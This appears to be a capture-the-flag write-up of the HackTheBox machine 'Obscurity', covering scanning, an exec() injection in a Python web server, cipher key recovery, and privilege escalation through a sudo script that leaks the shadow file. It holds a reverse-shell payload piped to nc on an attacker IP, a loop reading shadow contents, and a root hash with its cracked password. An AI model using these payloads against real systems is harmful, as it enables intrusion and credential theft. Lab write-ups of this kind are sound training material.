Summary
Obscurity,a Linux box created by HackTheBox user clubby789, was an overall medium difficulty box. Initial foothold was finding the code for the webserver code and analyze it to figure out RCE. which get us low privilege shell. In User directory there is a python encryption script we can use to figure out users password. As user we can run a python script meant to replace SSH that we can use to gain access to roots password hash. using which we get Root.
Initial Scan
nmap
1 | # Nmap 7.80 scan initiated Sat Nov 30 15:01:37 2019 as: nmap -sC -sV -oN nmap/obscurity 10.10.10.168 |
If we navigate to the website on port 8080
we see a web-page for a company with a rather intresting take on security.
We read something interesting, at the bottom we see
1 | Message to server devs:the current source code for the webserver is in 'SuperSecureServer.py' in the secret development directory. |
So we can run wfuzz to find the code.
1 | wfuzz -c -w /usr/share/wordlists/dirb/small.txt 10.10.10.168:8080/FUZZ/SuperSecureServer.py |
which reveal the code is in develop
directory.
Getting the code and analyzing it
1 | info = "output = 'Document: {}'" # Keep the output for later debug |
Since we control over the path we can use that to get exec() to run code we want.
so we can execute payload with
1 | 10.10.10.168:8080/'; os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.X.X 9000 >/tmp/f");a='a |
which give us a shell as www-data
checking robert
home directory we find SuperSecureCrypt.py
and we find a encrypted file for robert
password and a test encrypted
and plaintext
file using
using the plain and the sample encrypted file we get the key
1 | utfenc ="¦ÚÈêÚÞØÛÝÝ×ÐÊß ÞÊÚÉæßÝËÚÛÚêÙÉëéÑÒÝÍÐ êÆáÙÞãÒÑÐáÙ¦ÕæØãÊÎÍßÚêÆÝáäèÎÍÚÎëÑÓäáÛÌ×v" |
which reveal the key as alexandrovich
and decrypting the passwordreminder.txt
we get the pasword as SecThruOBsFTW
which give us user and we can read user.txt
Privilege Escalation
So now that we are user we see that there is BetterSSH.py
in /home/robert/BetterSSH/ .
checking sudo -l
shows
1 | User robert may run the following commands on obscure: |
For some reason the scripts copies the output of the shadow file to a random file in /tmp/SSH.
so open two terminal session and run
1 | while True;do cat /tmp/SSH/* done |
in one of the session
and run sudo /home/robert/BetterSSH/BetterSSH.py
and Enter Username as test and password as test which give invalid password.
but in the first terminal we see the content of shadow
file so we can grab root
password hash as
1 | $6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1 |
We can crack the hash using john the ripper and the rockyou.txt
which give us the password asmercedes
so we can ssh to the box with root:mercedes
and can grab root.txt
1 | root@obscure:~# id;hostname;cut -c 1-15 /root/root.txt |
and we have pwned Obscurity
💃